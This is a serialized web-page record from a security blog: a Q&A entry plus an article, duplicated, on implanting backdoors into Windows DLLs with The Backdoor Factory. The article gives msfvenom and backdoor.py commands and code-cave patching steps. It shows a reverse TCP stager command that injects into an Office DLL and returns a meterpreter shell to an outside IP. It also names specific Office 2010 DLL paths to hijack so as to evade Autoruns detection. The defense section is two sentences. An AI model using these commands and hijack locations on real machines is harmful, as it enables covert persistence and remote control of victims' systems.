[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fBrwiGLQjwgJfo6o6zCq0J1GSjAreNGpeKskXwxxRJ6E":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},310,"Can The Backdoor Factory be used to hijack DLL export functions specifically?","Yes. By default, the tool hijacks the DLL's initialization code (e.g., DllMain), so the payload runs when LoadLibrary is called. To trigger the payload only when an exported function is invoked, you can modify the jump code to point to the desired export function. The article notes this flexibility for scenarios like [COM Object hijacking](\u002Fnews\u002Fuse-com-object-hijacking-to-maintain-persistence-hijack-explorer-exe) or virtual file techniques ([Hiding ASP.NET Webshells](\u002Fnews\u002Fpenetration-techniques-hiding-asp-net-webshells-using-virtual-files)).","\u003Cp>Yes. By default, the tool hijacks the DLL&#39;s initialization code (e.g., DllMain), so the payload runs when LoadLibrary is called. To trigger the payload only when an exported function is invoked, you can modify the jump code to point to the desired export function. The article notes this flexibility for scenarios like [COM Object hijacking](\u002Fnews\u002Fuse-com-object-hijacking-to-maintain-persistence-hijack-explorer-exe) or virtual file techniques ([Hiding ASP.NET Webshells](\u002Fnews\u002Fpenetration-techniques-hiding-asp-net-webshells-using-virtual-files)).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fimplanting-backdoors-into-dll-files-using-bdf\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","can-the-backdoor-factory-be-used-to-hijack-dll-export-functions-specifically-1777484281609","export function hijacking, LoadLibrary, DllMain, BDF customization, DLL execution flow",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},79,"Implanting Backdoors into DLL Files Using BDF","implanting-backdoors-into-dll-files-using-bdf","Learn how to implant backdoors into DLL files using BDF, exploit DLL hijacking, and implement defense strategies against such attacks.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The previous article \"Implanting Backdoors into EXE Files Using BDF\" introduced the method of using The Backdoor Factory to implant backdoors into EXE files. This article will present the approach for implanting backdoors into DLL files, demonstrate a DLL hijacking exploitation method, summarize its characteristics, and analyze defense strategies.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Hijacking one's own DLL and fixing bugs\u003C\u002Fli>\u003Cli>Hijacking system DLLs to bypass Autoruns backdoor detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Exploitation Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The implantation approach for DLLs is similar to that for EXE files, which involves modifying the program's execution flow to jump to Code Caves, execute the payload, and then return to the normal program flow.\u003C\u002Fp>\u003Cp>The biggest difference between DLLs and EXE files is the additional functionality of export functions.\u003C\u002Fp>\u003Cp>When implementing DLL hijacking, it is often necessary to obtain the original DLL's export functions, simulate them, add the payload, and achieve exploitation.\u003C\u002Fp>\u003Cp>So, does The Backdoor Factory need to consider export functions when implanting backdoors into DLL files?\u003C\u002Fp>\u003Cp>Proceed with testing and draw conclusions\u003C\u002Fp>\u003Ch2>0x03 Write a program for testing\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Test Dll testdll.dll:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \u003Cwindows.h>\u003Cbr>#include \u003Cstdio.h>\u003Cbr>BOOL APIENTRY DllMain( HMODULE hModule,\u003Cbr>                       DWORD  ul_reason_for_call,\u003Cbr>                       LPVOID lpReserved\u003Cbr>\t\t\t\t\t )\u003Cbr>{\u003Cbr>\tswitch (ul_reason_for_call)\u003Cbr>\t{\u003Cbr>\tcase DLL_PROCESS_ATTACH:\u003Cbr>\t\t\u002F\u002FMessageBox(NULL, NULL, NULL, 0);\u003Cbr>\t\t\u002F\u002FSleep(5000);\u003Cbr>\t\tprintf(\"[+] DLL_PROCESS_ATTACH\\n\");\u003Cbr>\tcase DLL_THREAD_ATTACH:\u003Cbr>\t\tprintf(\"[+] DLL_THREAD_ATTACH\\n\");\u003Cbr>\tcase DLL_THREAD_DETACH:\u003Cbr>\t\tprintf(\"[+] DLL_THREAD_DETACH\\n\");\u003Cbr>\tcase DLL_PROCESS_DETACH:\u003Cbr>\t\tprintf(\"[+] DLL_PROCESS_DETACH\\n\");\u003Cbr>\t\tbreak;\u003Cbr>\t}\u003Cbr>\treturn TRUE;\u003Cbr>}\u003Cbr>\u003Cbr>void Export1()\u003Cbr>{\u003Cbr>\tprintf(\"[+] Export1\\n\");\u003Cbr>}\u003C\u002Fstdio.h>\u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Export function is Export1\u003C\u002Fp>\u003Cp>DLL loader loader.exe:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \u003Cwindows.h>\u003Cbr>typedef void(*Export)();\u003Cbr>int main(int argc, char* argv[])\u003Cbr>{\u003Cbr>\tExport exporttest;\u003Cbr>\tprintf(\"[*] LoadLibrary\\n\");\u003Cbr>\tHMODULE hDllLib = LoadLibrary(\"testdll.dll\");\u003Cbr>\texporttest=(Export)GetProcAddress(hDllLib ,\"Export1\");\u003Cbr>\texporttest();\u003Cbr>\tSleep(10000);\u003Cbr>\tFreeLibrary(hDllLib);\u003Cbr>\tprintf(\"[*] FreeLibrary\\n\");\u003Cbr>\treturn 0;\u003Cbr>}\u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The program execution is shown in the following diagram, loading testdll.dll and calling the exported function Export1\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018762197_0_ce3b0265bf.jpeg\">\u003C\u002Fp>\u003Cp>Using The Backdoor Factory to add a backdoor to a DLL file:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fexec CMD=calc.exe -f raw &gt;calc.bin\u003Cbr>.\u002Fbackdoor.py -f testdll.dll -s user_supplied_shellcode_threaded -U calc.bin -a\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execute loader.exe again, test as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018778508_1_e447a4b933.jpeg\">\u003C\u002Fp>\u003Cp>Payload executed successfully, but the program flow is altered, preventing normal return to FreeLibrary\u003C\u002Fp>\u003Cp>Need to debug the DLL to identify the cause of the error\u003C\u002Fp>\u003Cp>First, generate an empty jump template:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f testdll.dll -s cave_miner_inline\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Select the .text section\u003C\u002Fp>\u003Cp>Execute Loader.exe, the program runs normally, indicating the issue lies with the intermediate payload\u003C\u002Fp>\u003Cp>Open the new testdll.dll with Immunity Debugger, locate the hijack position, payload is stored at 0x10005716\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018787547_2_9692ed5685.jpeg\">\u003C\u002Fp>\u003Cp>It can be inferred here that as long as the payload maintains stack balance, it will not affect the normal execution of the program\u003C\u002Fp>\u003Cp>Next, fill in our payload at 0x10005716\u003C\u002Fp>\u003Cp>CFF Explorer can be used to add the payload\u003C\u002Fp>\u003Cp>First locate the payload starting point\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>PUSHAD\u003Cbr>PUSHFD\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The corresponding hexadecimal code is 609C\u003C\u002Fp>\u003Cp>In CFF Explorer, switch to the Hex Editor view, search for 609C, locate the starting point at 0x0000571A\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The memory virtual address obtained through Immunity Debugger is 0x1000571A, which corresponds to the above, the position is correct\u003C\u002Fp>\u003Cp>To expand the payload space, the subsequent stack balance adjustment code can be shifted back as a whole\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018800773_3_cfcc5028a4.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018807598_4_387c33911a.jpeg\">\u003C\u002Fp>\u003Cp>Shift the data from 0x0005772 to 0x0000579E backward, and fill the middle with 0x90\u003C\u002Fp>\u003Cp>Select this part, right-click - Copy - Hex\u003C\u002Fp>\u003Cp>Find a suitable location, right-click - Fill With...\u003C\u002Fp>\u003Cp>The complete operation is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018814503_5_55b539c17f.png\">\u003C\u002Fp>\u003Cp>Following this method, fill the middle with the modified payload to complete the bug fix\u003C\u002Fp>\u003Cp>By viewing the DLL file through Immunity Debugger, it can be seen that The Backdoor Factory's jump hijacking positions for DLL and EXE files are the same\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018823260_6_6b02265b7f.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Conclusion:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For DLL files, hijacking the initialization part results in the payload being executed when LoadLibrary is called. If you want the payload to execute when the program loads the DLL's exported functions, modify the jump code to the exported function\u003C\u002Fp>\u003Ch2>0x04 Hijacking System DLLs\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>For Office 2010, sharing several DLL hijacking exploitation locations I found\u003C\u002Fp>\u003Ch3>1. Hijacking Word - Review View\u003C\u002Fh3>\u003Cp>LOCALSVC.DLL, located at C:\\Program Files\\Common Files\\microsoft shared\\RRLoc14\\\u003C\u002Fp>\u003Cp>Add payload to this DLL\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f LOCALSVC.DLL -H 192.168.81.192 -P 4444 -s reverse_tcp_stager_threaded\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Replace DLL (requires administrator privileges), launch word.exe, switch to Review View, meterpreter shell returns\u003C\u002Fp>\u003Cp>Test as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018827852_7_6f6d7bd502.png\">\u003C\u002Fp>\u003Ch3>2. Hijacking Word - Insert - Picture\u003C\u002Fh3>\u003Cp>tiptsf.dll, located at C:\\Program Files\\Common Files\\microsoft shared\\ink\\\u003C\u002Fp>\u003Cp>Requires TrustedInstaller privileges to replace\u003C\u002Fp>\u003Cp>For how to obtain TrustedInstaller privileges, refer to the article 'Penetration Techniques - Token Theft and Exploitation'\u003C\u002Fp>\u003Ch3>3. Hijacking Word - File\u003C\u002Fh3>\u003Cp>Also affects other locations:\u003C\u002Fp>\u003Cp>Word - Page Layout - Themes - Browse Themes\u003C\u002Fp>\u003Cp>GrooveIntlResource.dll, located at C:\\Program Files\\Microsoft Office\\Office14\\2052\u003C\u002Fp>\u003Cp>Administrator privileges required\u003C\u002Fp>\u003Ch3>4. Hijacking Excel-Insert-Picture\u003C\u002Fh3>\u003Cp>MSPTLS.DLL, located at C:\\Program Files\\Common Files\\microsoft shared\\OFFICE14\\\u003C\u002Fp>\u003Cp>Administrator privileges required\u003C\u002Fp>\u003Cp>The above tests are shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018832462_8_019a858d8b.png\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This section is only to demonstrate some exploitation methods of DLL hijacking. These specific hijacking locations only activate when particular software functions are opened, thus bypassing Autoruns detection.\u003C\u002Fp>\u003Ch2>0x05 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>For system DLLs, they typically carry Microsoft signatures. If a backdoor is implanted into the DLL, the signature will become invalid, which is a commonly discussed issue.\u003C\u002Fp>\u003Cp>For third-party developed software, if the third-party DLLs called are unsigned, the risk of exploitation is significant.\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article tests the method of implanting backdoors into DLL files using The Backdoor Factory, introduces ideas for fixing bugs, shares a method for exploiting DLL hijacking, intended for testing purposes only, and by summarizing the characteristics of this exploitation method, briefly discusses issues to be aware of in terms of defense.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The previous article \"Implanting Backdoors into EXE Files Using BDF\" introduced the method of using The Backdoor Factory to implant backdoors into EXE files. This article will present the approach for implanting backdoors into DLL files, demonstrate a DLL hijacking exploitation method, summarize its characteristics, and analyze defense strategies.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Hijacking one's own DLL and fixing bugs\u003C\u002Fli>\u003Cli>Hijacking system DLLs to bypass Autoruns backdoor detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Exploitation Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The implantation approach for DLLs is similar to that for EXE files, which involves modifying the program's execution flow to jump to Code Caves, execute the payload, and then return to the normal program flow.\u003C\u002Fp>\u003Cp>The biggest difference between DLLs and EXE files is the additional functionality of export functions.\u003C\u002Fp>\u003Cp>When implementing DLL hijacking, it is often necessary to obtain the original DLL's export functions, simulate them, add the payload, and achieve exploitation.\u003C\u002Fp>\u003Cp>So, does The Backdoor Factory need to consider export functions when implanting backdoors into DLL files?\u003C\u002Fp>\u003Cp>Proceed with testing and draw conclusions\u003C\u002Fp>\u003Ch2>0x03 Write a program for testing\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Test Dll testdll.dll:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \u003Cwindows.h>\u003Cbr>#include \u003Cstdio.h>\u003Cbr>BOOL APIENTRY DllMain( HMODULE hModule,\u003Cbr>                       DWORD  ul_reason_for_call,\u003Cbr>                       LPVOID lpReserved\u003Cbr>\t\t\t\t\t )\u003Cbr>{\u003Cbr>\tswitch (ul_reason_for_call)\u003Cbr>\t{\u003Cbr>\tcase DLL_PROCESS_ATTACH:\u003Cbr>\t\t\u002F\u002FMessageBox(NULL, NULL, NULL, 0);\u003Cbr>\t\t\u002F\u002FSleep(5000);\u003Cbr>\t\tprintf(\"[+] DLL_PROCESS_ATTACH\\n\");\u003Cbr>\tcase DLL_THREAD_ATTACH:\u003Cbr>\t\tprintf(\"[+] DLL_THREAD_ATTACH\\n\");\u003Cbr>\tcase DLL_THREAD_DETACH:\u003Cbr>\t\tprintf(\"[+] DLL_THREAD_DETACH\\n\");\u003Cbr>\tcase DLL_PROCESS_DETACH:\u003Cbr>\t\tprintf(\"[+] DLL_PROCESS_DETACH\\n\");\u003Cbr>\t\tbreak;\u003Cbr>\t}\u003Cbr>\treturn TRUE;\u003Cbr>}\u003Cbr>\u003Cbr>void Export1()\u003Cbr>{\u003Cbr>\tprintf(\"[+] Export1\\n\");\u003Cbr>}\u003C\u002Fstdio.h>\u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Export function is Export1\u003C\u002Fp>\u003Cp>DLL loader loader.exe:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \u003Cwindows.h>\u003Cbr>typedef void(*Export)();\u003Cbr>int main(int argc, char* argv[])\u003Cbr>{\u003Cbr>\tExport exporttest;\u003Cbr>\tprintf(\"[*] LoadLibrary\\n\");\u003Cbr>\tHMODULE hDllLib = LoadLibrary(\"testdll.dll\");\u003Cbr>\texporttest=(Export)GetProcAddress(hDllLib ,\"Export1\");\u003Cbr>\texporttest();\u003Cbr>\tSleep(10000);\u003Cbr>\tFreeLibrary(hDllLib);\u003Cbr>\tprintf(\"[*] FreeLibrary\\n\");\u003Cbr>\treturn 0;\u003Cbr>}\u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The program execution is shown in the following diagram, loading testdll.dll and calling the exported function Export1\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018762197_0_ce3b0265bf-1.jpeg\">\u003C\u002Fp>\u003Cp>Using The Backdoor Factory to add a backdoor to a DLL file:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fexec CMD=calc.exe -f raw &gt;calc.bin\u003Cbr>.\u002Fbackdoor.py -f testdll.dll -s user_supplied_shellcode_threaded -U calc.bin -a\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execute loader.exe again, test as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018778508_1_e447a4b933-1.jpeg\">\u003C\u002Fp>\u003Cp>Payload executed successfully, but the program flow is altered, preventing normal return to FreeLibrary\u003C\u002Fp>\u003Cp>Need to debug the DLL to identify the cause of the error\u003C\u002Fp>\u003Cp>First, generate an empty jump template:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f testdll.dll -s cave_miner_inline\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Select the .text section\u003C\u002Fp>\u003Cp>Execute Loader.exe, the program runs normally, indicating the issue lies with the intermediate payload\u003C\u002Fp>\u003Cp>Open the new testdll.dll with Immunity Debugger, locate the hijack position, payload is stored at 0x10005716\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018787547_2_9692ed5685-1.jpeg\">\u003C\u002Fp>\u003Cp>It can be inferred here that as long as the payload maintains stack balance, it will not affect the normal execution of the program\u003C\u002Fp>\u003Cp>Next, fill in our payload at 0x10005716\u003C\u002Fp>\u003Cp>CFF Explorer can be used to add the payload\u003C\u002Fp>\u003Cp>First locate the payload starting point\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>PUSHAD\u003Cbr>PUSHFD\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The corresponding hexadecimal code is 609C\u003C\u002Fp>\u003Cp>In CFF Explorer, switch to the Hex Editor view, search for 609C, locate the starting point at 0x0000571A\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The memory virtual address obtained through Immunity Debugger is 0x1000571A, which corresponds to the above, the position is correct\u003C\u002Fp>\u003Cp>To expand the payload space, the subsequent stack balance adjustment code can be shifted back as a whole\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018800773_3_cfcc5028a4-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018807598_4_387c33911a-1.jpeg\">\u003C\u002Fp>\u003Cp>Shift the data from 0x0005772 to 0x0000579E backward, and fill the middle with 0x90\u003C\u002Fp>\u003Cp>Select this part, right-click - Copy - Hex\u003C\u002Fp>\u003Cp>Find a suitable location, right-click - Fill With...\u003C\u002Fp>\u003Cp>The complete operation is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018814503_5_55b539c17f-1.png\">\u003C\u002Fp>\u003Cp>Following this method, fill the middle with the modified payload to complete the bug fix\u003C\u002Fp>\u003Cp>By viewing the DLL file through Immunity Debugger, it can be seen that The Backdoor Factory's jump hijacking positions for DLL and EXE files are the same\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018823260_6_6b02265b7f-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Conclusion:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For DLL files, hijacking the initialization part results in the payload being executed when LoadLibrary is called. If you want the payload to execute when the program loads the DLL's exported functions, modify the jump code to the exported function\u003C\u002Fp>\u003Ch2>0x04 Hijacking System DLLs\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>For Office 2010, sharing several DLL hijacking exploitation locations I found\u003C\u002Fp>\u003Ch3>1. Hijacking Word - Review View\u003C\u002Fh3>\u003Cp>LOCALSVC.DLL, located at C:\\Program Files\\Common Files\\microsoft shared\\RRLoc14\\\u003C\u002Fp>\u003Cp>Add payload to this DLL\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f LOCALSVC.DLL -H 192.168.81.192 -P 4444 -s reverse_tcp_stager_threaded\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Replace DLL (requires administrator privileges), launch word.exe, switch to Review View, meterpreter shell returns\u003C\u002Fp>\u003Cp>Test as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018827852_7_6f6d7bd502-1.png\">\u003C\u002Fp>\u003Ch3>2. Hijacking Word - Insert - Picture\u003C\u002Fh3>\u003Cp>tiptsf.dll, located at C:\\Program Files\\Common Files\\microsoft shared\\ink\\\u003C\u002Fp>\u003Cp>Requires TrustedInstaller privileges to replace\u003C\u002Fp>\u003Cp>For how to obtain TrustedInstaller privileges, refer to the article 'Penetration Techniques - Token Theft and Exploitation'\u003C\u002Fp>\u003Ch3>3. Hijacking Word - File\u003C\u002Fh3>\u003Cp>Also affects other locations:\u003C\u002Fp>\u003Cp>Word - Page Layout - Themes - Browse Themes\u003C\u002Fp>\u003Cp>GrooveIntlResource.dll, located at C:\\Program Files\\Microsoft Office\\Office14\\2052\u003C\u002Fp>\u003Cp>Administrator privileges required\u003C\u002Fp>\u003Ch3>4. Hijacking Excel-Insert-Picture\u003C\u002Fh3>\u003Cp>MSPTLS.DLL, located at C:\\Program Files\\Common Files\\microsoft shared\\OFFICE14\\\u003C\u002Fp>\u003Cp>Administrator privileges required\u003C\u002Fp>\u003Cp>The above tests are shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018832462_8_019a858d8b-1.png\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This section is only to demonstrate some exploitation methods of DLL hijacking. These specific hijacking locations only activate when particular software functions are opened, thus bypassing Autoruns detection.\u003C\u002Fp>\u003Ch2>0x05 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>For system DLLs, they typically carry Microsoft signatures. If a backdoor is implanted into the DLL, the signature will become invalid, which is a commonly discussed issue.\u003C\u002Fp>\u003Cp>For third-party developed software, if the third-party DLLs called are unsigned, the risk of exploitation is significant.\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article tests the method of implanting backdoors into DLL files using The Backdoor Factory, introduces ideas for fixing bugs, shares a method for exploiting DLL hijacking, intended for testing purposes only, and by summarizing the characteristics of this exploitation method, briefly discusses issues to be aware of in terms of defense.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1383,"Onedaysec",5,"published","2026-02-02T08:06:59.472Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Implant Backdoors in DLL Files Using BDF: Exploit & Defense","DLL backdoor, BDF exploit, DLL hijacking, backdoor factory, malware defense, code caves, payload injection",null,false,[],{"docs":43,"hasNextPage":40},[4,44,45,46],309,308,307,{"title":39,"description":39,"image":39},"2026-07-24T15:37:14.244Z","2026-07-23T16:01:21.895Z","draft","2026-07-23T16:05:16.129Z"]